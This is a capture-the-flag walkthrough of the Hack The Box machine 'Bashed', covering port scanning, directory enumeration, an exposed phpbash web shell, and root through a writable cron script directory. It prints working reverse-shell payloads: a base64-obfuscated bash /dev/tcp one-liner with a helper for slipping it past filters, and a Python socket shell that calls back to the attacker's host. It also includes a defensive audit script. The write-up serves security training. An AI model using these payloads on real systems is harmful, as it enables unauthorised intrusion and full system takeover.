⚠️ Disclaimer: the techniques, ideas and tools in this article are provided solely for security education and exchange. If you do not agree with this, please close the page! Nobody may use them for illegal purposes or for profit; anyone who does bears the consequences themselves!
🎯 Objective
🔍 Information gathering
Scan all ports
┌──(liona㉿kali)-[~/Workspace/HTB/Bashed]
└─$ sudo nmap -sS -p- 10.10.10.68 --max-retries=0 -Pn -oN allports.txt -oX allports.xml
Starting Nmap 7.92 ( https://nmap.org ) at 2022-04-04 13:35 CST
Warning: 10.10.10.68 giving up on port because retransmission cap hit (0).
Nmap scan report for 10.10.10.68 (10.10.10.68)
Host is up (0.27s latency).
Not shown: 55852 closed tcp ports (reset), 9682 filtered tcp ports (no-response)
PORT   STATE SERVICE
80/tcp open  http

Nmap done: 1 IP address (1 host up) scanned in 87.62 seconds
Enumerate services on the open ports
┌──(liona㉿kali)-[~/Workspace/HTB/Bashed]
└─$ sudo nmap -sC -sV -p $(cat allports.txt| grep ^[0-9] | cut -d / -f1 | tr '\n' ',' | sed s/,$//) -Pn 10.10.10.68 -oN nmap.txt -oX nmap.xml
Starting Nmap 7.92 ( https://nmap.org ) at 2022-04-04 13:39 CST
Nmap scan report for 10.10.10.68 (10.10.10.68)
Host is up (0.29s latency).

PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Arrexel's Development Site
|_http-server-header: Apache/2.4.18 (Ubuntu)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 14.94 seconds
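The second command builds its -p list from allports.txt with a grep/cut/tr/sed pipeline. The Python below is an added example, not part of the original write-up, that does the same parse on a constructed -oN sample (the ports, services and timestamps in SAMPLE_ALLPORTS are made up) and additionally lets you choose which port states are carried over to the service scan, since the one-liner forwards every line that starts with a digit, filtered ports included:

```python
import re

# Constructed stand-in for allports.txt (nmap -oN output); not the page's real scan.
SAMPLE_ALLPORTS = """\
# Nmap 7.92 scan initiated Mon Apr  4 13:35:00 2022 as: nmap -sS -p- --max-retries=0 -Pn -oN allports.txt 10.10.10.68
Warning: 10.10.10.68 giving up on port because retransmission cap hit (0).
Nmap scan report for 10.10.10.68
Host is up (0.27s latency).
Not shown: 65531 closed tcp ports (reset)
PORT      STATE    SERVICE
22/tcp    open     ssh
80/tcp    open     http
443/tcp   filtered https
8080/tcp  open     http-proxy
# Nmap done at Mon Apr  4 13:36:27 2022 -- 1 IP address (1 host up) scanned in 87.62 seconds
"""

# One port line: "80/tcp open http" (the service column may be empty on a raw -sS scan).
PORT_LINE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s*(\S*)")


def parse_ports(text):
    """Return [(port, proto, state, service), ...] for every port line in -oN output."""
    rows = []
    for line in text.splitlines():
        m = PORT_LINE.match(line)
        if m:
            rows.append((int(m.group(1)), m.group(2), m.group(3), m.group(4)))
    return rows


def port_spec(text, states=("open",)):
    """Comma-separated value for nmap -p, like the page's grep/cut/tr/sed pipeline.

    The pipeline keeps every line that starts with a digit, filtered ports included;
    this version keeps only the requested states, so the slow -sC -sV pass is not
    spent on ports that never answered unless you ask for them."""
    ports = sorted({p for p, _, st, _ in parse_ports(text) if st in states})
    return ",".join(str(p) for p in ports)


if __name__ == "__main__":
    print("nmap -sC -sV -p", port_spec(SAMPLE_ALLPORTS), "10.10.10.68")
```

With --max-retries=0 on a lossy link, a port that drops the single SYN probe is reported as filtered rather than retried, so passing states=("open", "filtered") for a second, slower pass is the quick way to recover anything the fast scan missed.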
Only port 80 is open on the target, so let's look at what the web server serves. Note that --max-retries=0 on a roughly 270 ms link marks every port that does not answer the first probe as filtered instead of retrying (9682 of them here), so a second pass over the filtered ports is worthwhile if the results look thin.
The page mentions phpbash; click through to the linked post.
The post links to a GitHub repository; open it as well.
phpbash is a shell interface served over the web, so it will almost certainly be what we use.
There was nothing else of note. /uploads/phpbash.php, /phpbash.php, /uploads/phpbash.min.php and /phpbash.min.php were all tried, and none of them exist.
Since the file is mentioned, the objective is clear: find the path of that file and use the shell.
🔍 Locating the file
┌──(liona㉿kali)-[~/Workspace/HTB/Bashed]
└─$ gobuster dir -u http://10.10.10.68 -w ../../SecLists/Discovery/Web-Content/directory-list-lowercase-2.3-small.txt --add-slash
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.10.10.68
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                ../../SecLists/Discovery/Web-Content/directory-list-lowercase-2.3-small.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Add Slash:               true
[+] Timeout:                 10s
===============================================================
2022/04/04 13:51:16 Starting gobuster in directory enumeration mode
===============================================================
/images/              (Status: 200) [Size: 1564]
/icons/               (Status: 403) [Size: 292]
/uploads/             (Status: 200) [Size: 14]
/php/                 (Status: 200) [Size: 939]
/css/                 (Status: 200) [Size: 1758]
/dev/                 (Status: 200) [Size: 1148]
/js/                  (Status: 200) [Size: 3165]
/fonts/               (Status: 200) [Size: 2095]
The directories worth attention are uploads, php and dev.
Visiting each of the three in turn, http://10.10.10.68/dev/ is the one that lists two files.
Opening http://10.10.10.68/dev/phpbash.php gives an interactive shell in the browser.
💥 Attack
Start a listener
┌──(liona㉿kali)-[~/Workspace/HTB/Bashed]
└─$ nc -nvlp 1234
Ncat: Version 7.92 ( https://nmap.org/ncat )
Ncat: Listening on :::1234
Ncat: Listening on 0.0.0.0:1234
Reverse shell
No connection came back, so the input is probably being filtered; use base64 to get around it.
┌──(liona㉿kali)-[~/Workspace/HTB/Bashed]
└─$ echo -n "/bin/bash -i >& /dev/tcp/10.10.14.26/1234 0>&1" | base64
L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwLzEwLjEwLjE0LjI2LzEyMzQgMD4mMQ==
Running the decode-and-execute line on the target then pops the shell on the listener:
echo L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwLzEwLjEwLjE0LjI2LzEyMzQgMD4mMQ== | base64 -d | bash
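Why the base64 detour works: the raw command needs the redirection characters `>`, `&` and `<`, while the wrapper line and the base64 output do not. The Python below is an added example, not from the original post, that produces the same one-liner from the same payload, reports which suspect characters each form contains, and handles the case where the filter also rejects base64's own `/`, `+` or `=` by padding the command with whitespace (the blocklist and the padding strategy are my assumptions for illustration, not something the page's phpbash filter is known to do):

```python
import base64
import shlex

# Same reverse-shell command as on the page; the '>', '&' and '<' it needs are what a
# naive input filter typically strips, and a stripped redirection silently breaks it.
PAYLOAD = "/bin/bash -i >& /dev/tcp/10.10.14.26/1234 0>&1"
REDIRECT_CHARS = set("<>&")   # assumed blocklist for the demonstration


def filtered_chars(text, blocklist=REDIRECT_CHARS):
    """Characters of `text` that fall in the blocklist (sorted, for stable output)."""
    return sorted(set(text) & set(blocklist))


def wrap_base64(command, avoid=""):
    """Return 'echo <b64> | base64 -d | bash' for `command`.

    The wrapper only needs letters, digits, spaces, '|' and '-' plus the base64
    alphabet, so redirection characters never cross the filter. base64 itself can
    emit '/', '+' and '='; if any of those are listed in `avoid`, leading/trailing
    spaces (harmless to bash) are added to shift the encoding until it is clean.
    Padding only changes the tail and the 3-byte alignment, so this can fail, in
    which case ValueError is raised rather than shipping a broken one-liner."""
    for lead in range(3):
        for trail in range(3):
            padded = " " * lead + command + " " * trail
            enc = base64.b64encode(padded.encode()).decode("ascii")
            if not (set(enc) & set(avoid)):
                return f"echo {enc} | base64 -d | bash"
    raise ValueError("no whitespace padding avoids %r" % avoid)


def unwrap_base64(oneliner):
    """Recover the original command from a wrapper line (handy when reviewing logs)."""
    parts = shlex.split(oneliner)   # ['echo', '<b64>', '|', 'base64', '-d', '|', 'bash']
    return base64.b64decode(parts[1]).decode()


if __name__ == "__main__":
    print("raw payload uses:", filtered_chars(PAYLOAD))
    print(wrap_base64(PAYLOAD))
```

unwrap_base64 is the defender's half of the same trick: an `echo ... | base64 -d | bash` line in an access log or a web-shell history is worth decoding before deciding what the attacker actually ran.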
Get user.txt
www-data@bashed:/home$ cat arrexel/user.txt
cat arrexel/user.txt
2c281f318555dbc1b856957c7147bfc1
Get root.txt
Check sudo privileges
www-data@bashed:/home$ sudo
sudo
usage: sudo -h | -K | -k | -V
usage: sudo -v [-AknS] [-g group] [-h host] [-p prompt] [-u user]
usage: sudo -l [-AknS] [-g group] [-h host] [-p prompt] [-U user] [-u user] [command]
usage: sudo [-AbEHknPS] [-r role] [-t type] [-C num] [-g group] [-h host] [-p prompt] [-u user] [VAR=value] [-i|-s] [<command>]
usage: sudo -e [-AknS] [-r role] [-t type] [-C num] [-g group] [-h host] [-p prompt] [-u user] file ...
www-data@bashed:/home$ sudo -l
sudo -l
Matching Defaults entries for www-data on bashed:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User www-data may run the following commands on bashed:
    (scriptmanager : scriptmanager) NOPASSWD: ALL
So we can run any command as the scriptmanager user without a password (the entry grants scriptmanager, not root). sudo -u scriptmanager /bin/bash returns a shell with no prompt because there is no TTY; spawning a pty with Python fixes that:
www-data@bashed:/home$ sudo -u scriptmanager /bin/bash
sudo -u scriptmanager /bin/bash
ls
arrexel  scriptmanager
python -c "import pty;pty.spawn('/bin/bash')"
scriptmanager@bashed:/home$ cd
cd
scriptmanager@bashed:~$
We now have scriptmanager privileges; next, see whether we can escalate to root.
Use pspy to watch processes
┌──(liona㉿kali)-[~/Workspace/HTB/Bashed]
└─$ ls
allports.txt  allports.xml  nmap.txt  nmap.xml  pspy64  run.py

┌──(liona㉿kali)-[~/Workspace/HTB/Bashed]
└─$ python -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
scriptmanager@bashed:~$ cd /tmp
cd /tmp
scriptmanager@bashed:/tmp$ wget http://10.10.14.26/pspy64
wget http://10.10.14.26/pspy64
--2022-04-06 09:04:09--  http://10.10.14.26/pspy64
Connecting to 10.10.14.26:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 3078592 (2.9M) [application/octet-stream]
Saving to: 'pspy64'

pspy64              100%[===================>]   2.94M  1.10MB/s    in 2.7s

2022-04-06 09:04:12 (1.10 MB/s) - 'pspy64' saved [3078592/3078592]

scriptmanager@bashed:/tmp$ chmod +x pspy64
scriptmanager@bashed:/tmp$ ./pspy64
It shows a scheduled task on the system:
2022/04/06 09:05:10 CMD: UID=0 PID=1 | /sbin/init noprompt
2022/04/06 09:06:01 CMD: UID=0 PID=952 | python test.py
2022/04/06 09:06:01 CMD: UID=0 PID=951 | /bin/sh -c cd /scripts; for f in *.py; do python "$f"; done
2022/04/06 09:06:01 CMD: UID=0 PID=950 | /usr/sbin/CRON -f
Cron periodically runs every Python script in /scripts as root (UID=0). First check whether the current user can create files in that directory:
scriptmanager@bashed:/scripts$ ls
ls
test.py  test.txt
scriptmanager@bashed:/scripts$ touch liona.py
touch liona.py
scriptmanager@bashed:/scripts$ ls
ls
liona.py  test.py  test.txt
scriptmanager@bashed:/scripts$
We can, which makes this easy: drop a Python reverse shell into the directory and cron will run it as root.
┌──(liona㉿kali)-[~/Workspace/HTB/Bashed]
└─$ cat liona.py
import socket,subprocess,os
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("10.10.14.26",2345))
os.dup2(s.fileno(),0)
os.dup2(s.fileno(),1)
os.dup2(s.fileno(),2)
p=subprocess.call(["/bin/sh","-i"])
The file is fetched from the same Python web server as before. I used a different port for this shell so the earlier connection stays open, which makes any problems easier to sort out.
scriptmanager@bashed:/scripts$ wget http://10.10.14.26/liona.py
wget http://10.10.14.26/liona.py
--2022-04-06 09:18:27--  http://10.10.14.26/liona.py
Connecting to 10.10.14.26:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 214 [text/x-python]
Saving to: 'liona.py'

liona.py            100%[===================>]     214  --.-KB/s    in 0s

2022-04-06 09:18:27 (43.9 MB/s) - 'liona.py' saved [214/214]

scriptmanager@bashed:/scripts$ chmod +x liona.py
chmod +x liona.py
scriptmanager@bashed:/scripts$
The chmod +x is not actually required, since the cron line invokes python "$f" rather than executing the file directly. Then just wait for the shell to connect:
┌──(liona㉿kali)-[~/Workspace/HTB/Bashed]
└─$ nc -nvlp 2345
Ncat: Version 7.92 ( https://nmap.org/ncat )
Ncat: Listening on :::2345
Ncat: Listening on 0.0.0.0:2345
Ncat: Connection from 10.10.10.68.
Ncat: Connection from 10.10.10.68:56682.
/bin/sh: 0: can't access tty; job control turned off
# ls
liona.py  test.py  test.txt
# whoami
root
#
Root obtained; all that is left is to read root.txt
# cat /root/root.txt
cc4f0afe3a1026d402ba10329674a8e2
#
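From the defender's side, the root cause is a root cron job that globs and executes files from a directory a lower-privileged account can write to. The Python below is an added example, not part of the original write-up or of the box, that audits such a directory the way the `cd /scripts; for f in *.py; do python "$f"; done` cron line would see it. It runs on a constructed temporary layout (the file names and modes in build_demo_dir are made up to resemble /scripts; trusted_uid defaults to root, and the demo passes the current uid so only the permission bits are exercised):

```python
import fnmatch
import os
import stat
import tempfile


def audit_cron_scripts(scripts_dir, trusted_uid=0, pattern="*.py"):
    """Map path -> reasons for anything that lets an untrusted user decide what a
    root cron line such as
        cd /scripts; for f in *.py; do python "$f"; done
    ends up executing: a writable or foreign-owned directory (new matching files
    can be dropped in, which is exactly the escalation above) and any existing
    matching script that is writable or not owned by the trusted uid."""
    findings = {}

    def check(path):
        st = os.lstat(path)
        reasons = []
        if st.st_uid != trusted_uid:
            reasons.append("owned by uid %d, not %d" % (st.st_uid, trusted_uid))
        if st.st_mode & stat.S_IWGRP:
            reasons.append("group-writable")
        if st.st_mode & stat.S_IWOTH:
            reasons.append("world-writable")
        if stat.S_ISLNK(st.st_mode):
            reasons.append("symlink; its target is outside this check")
        if reasons:
            findings[path] = reasons

    check(scripts_dir)
    for name in sorted(os.listdir(scripts_dir)):
        if fnmatch.fnmatch(name, pattern):
            check(os.path.join(scripts_dir, name))
    return findings


def build_demo_dir():
    """Constructed layout imitating the box's /scripts (not copied from the target):
    a world-writable directory holding a 0644 test.py, a 0666 helper.py, and a
    0666 test.txt that the cron glob ignores."""
    d = tempfile.mkdtemp(prefix="scripts_")
    os.chmod(d, 0o777)
    for name, mode in (("test.py", 0o644), ("helper.py", 0o666), ("test.txt", 0o666)):
        p = os.path.join(d, name)
        with open(p, "w") as fh:
            fh.write("print('hello')\n")
        os.chmod(p, mode)
    return d


def run_demo():
    """Audit the constructed directory; keys are relative to it ('.' is the dir itself).
    The current uid is passed as trusted so the result reflects mode bits only."""
    d = build_demo_dir()
    findings = audit_cron_scripts(d, trusted_uid=os.getuid())
    return {os.path.relpath(p, d): r for p, r in findings.items()}


if __name__ == "__main__":
    for path, reasons in run_demo().items():
        print(path, "->", ", ".join(reasons))
```

On a real host you would call audit_cron_scripts("/scripts") as-is. An empty result means the directory and every *.py in it are root-owned and writable by nobody else, which is the fix that would have closed this path; note that a writable directory is a finding even when every existing script is clean, because the glob picks up whatever gets dropped in next.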
Summary
Knowledge points
- Privilege escalation via root processes: gaining root through a program that root runs (here a cron job that executes every *.py in a directory a lower-privileged user can write to)
- Upgrading to a full PTY
Tips
- base64 encoding and decoding can bypass some character filters
- Python's built-in web server (python -m http.server) works as an ad-hoc file-transfer service, so scripts can be written locally and fetched with wget instead of typed into a limited shell